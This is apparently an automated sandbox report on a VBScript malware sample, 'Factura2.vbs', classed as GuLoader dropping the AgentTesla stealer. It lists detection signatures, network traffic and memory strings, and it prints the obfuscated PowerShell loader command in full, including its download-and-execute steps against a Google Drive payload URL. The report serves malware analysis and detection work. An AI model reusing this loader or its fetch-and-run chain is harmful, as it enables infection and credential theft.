Windows Analysis Report
Factura2.vbs

Overview

General Information

Sample name:	Factura2.vbs
Analysis ID:	1427893
MD5:	9500105068ac091471491a1a7c9065c2
SHA1:	f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
SHA256:	ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
Tags:	vbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected AgentTesla

Yara detected GuLoader

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Factura2.vbs

Virustotal: Detection: 16%

Perma Link

Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: newfile.exe

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49713 -> 114.142.162.17:26

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 114.142.162.17 114.142.162.17

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73
Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPb
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6136.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6388
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6388	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6388	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489B611	2_2_00007FFD3489B611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489C3C1	2_2_00007FFD3489C3C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348960FA	2_2_00007FFD348960FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896090	2_2_00007FFD34896090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896715	2_2_00007FFD34896715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34893BFB	2_2_00007FFD34893BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896B70	2_2_00007FFD34896B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6F258	5_2_04F6F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6FB28	5_2_04F6FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6EF10	5_2_04F6EF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD9AA8	5_2_07DD9AA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A54AD0	10_2_00A54AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A53EB8	10_2_00A53EB8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A54200	10_2_00A54200
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A5F858	10_2_00A5F858
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_00381C5C	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003825D3	12_2_003825D3

Java / VBScript file with very long strings (likely obfuscated code)

Source: Factura2.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

